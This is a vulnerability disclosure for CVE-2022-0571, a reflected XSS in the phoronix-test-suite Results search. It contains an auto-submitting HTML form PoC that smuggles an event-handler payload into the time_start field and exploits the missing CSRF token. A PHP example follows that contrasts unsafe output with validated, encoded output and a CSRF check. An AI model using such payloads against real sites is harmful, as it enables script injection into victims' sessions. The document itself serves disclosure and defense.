Headline
CVE-2022-0571: Cross-site Scripting (XSS) - Reflected in phoronix-test-suite
Cross-site Scripting (XSS) - Reflected in GitHub repository phoronix-test-suite/phoronix-test-suite prior to 10.8.2.
Description
Hi, I found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.
Proof of Concept
Install a local instance of phoronix.
Create a Search results form like this:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8222/?results" method="POST">
<input type="hidden" name="time_start" value="2022-02-08&quot;onfocus=&quot;confirm(origin)&quot;autofocus=&quot;" />
<input type="hidden" name="time_end" value="2022-02-09" />
<input type="hidden" name="containing_tests" value="testt" />
<input type="hidden" name="result_limit" value="100" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
//
and send it to the victim. When the victim clicks the link, the result is reflected cross-site scripting.
Impact
This vulnerability is capable of Reflected XSS
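The following is an added example, not code from phoronix-test-suite or from the report: it contrasts echoing a POSTed date into an attribute unencoded with a version that validates the date and encodes it for the attribute context, and adds the anti-CSRF check the report notes is missing. All function names and the `csrf` field are hypothetical.

```php
<?php
declare(strict_types=1);
// Added illustration. Function names and the 'csrf' field are hypothetical,
// not taken from phoronix-test-suite.

// Vulnerable pattern: request data concatenated into an attribute value.
function render_date_unsafe(string $name, string $raw): string
{
    return '<input type="text" name="' . $name . '" value="' . $raw . '" />';
}

// Accept only a strict YYYY-MM-DD calendar date; anything else becomes null.
function parse_iso_date(string $raw): ?string
{
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : null;
}

// Encode for a quoted attribute: ENT_QUOTES converts both " and '.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering: validate first, then encode on output.
function render_date_safe(string $name, string $raw): string
{
    $value = parse_iso_date($raw) ?? '';
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '" />';
}

// Reject a POST whose token does not match the one stored in the session.
function csrf_ok(array $session, array $post): bool
{
    $want = $session['csrf'] ?? null;
    $got  = $post['csrf'] ?? null;
    return is_string($want) && is_string($got) && hash_equals($want, $got);
}

// Constructed input modelled on the time_start value in the PoC above.
$post = ['time_start' => '2022-02-08"onfocus="confirm(origin)"autofocus="'];

// The unsafe renderer lets the value close the attribute; the safe one drops it.
echo render_date_unsafe('time_start', $post['time_start']), PHP_EOL;
echo render_date_safe('time_start', $post['time_start']), PHP_EOL;
echo render_date_safe('time_start', '2022-02-08'), PHP_EOL;
// A cross-origin auto-submitted form carries no token, so the check fails.
var_dump(csrf_ok(['csrf' => bin2hex(random_bytes(16))], $post));
```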